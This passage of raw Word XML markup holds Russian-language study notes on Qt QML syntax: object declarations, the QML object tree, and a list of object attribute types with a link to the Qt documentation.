          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые следует создать. Каждый </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> может также содержать объявления дочерних </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ов. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Есть пример объявления </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Маленькие </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ы можно писать в одну строку</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть пример кода</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также есть пример кода создания дочерних </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ов. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также отмечается, что </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">иерархически связанные </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ы не обязательно являются таковыми на экране</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В то время как родительское свойство может быть изменено в визуальном представлении, этого нельзя сделать по отношению к дереву </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также описано, какие должны быть в </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">данном языке комментарии. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть пример кода.</w:t>
      </w:r>
      <w:r w:rsidR="00C523A6" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дрэва кмл-аб’ектаў – гэта важнейшае паняцце тэхналогіі кмл)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A25E2" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc382058564"/>
      <w:bookmarkStart w:id="17" w:name="_Toc483000523"/>
      <w:bookmarkStart w:id="18" w:name="_Toc483003568"/>
      <w:bookmarkStart w:id="19" w:name="_Toc483603876"/>
      <w:bookmarkStart w:id="20" w:name="_Toc483605096"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">АТРИБУТЫ ОБЪЕКТОВ </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>syntax</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>objectattributes</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">каждый </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> тип </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а имеет определённый набор свойств. Каждый экземпляр типа </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а создаётся с набором свойств, которые были определены для этих </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ов. Есть несколько разных видов </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>атрибутов</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые могут быть определены. Типы атрибутов </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="008A25E2" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>идентификатор</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">свойство, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">сигналы, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">обработчики сигналов, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">методы, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>присоединённые свойства</w:t>
      </w:r>
    </w:p>
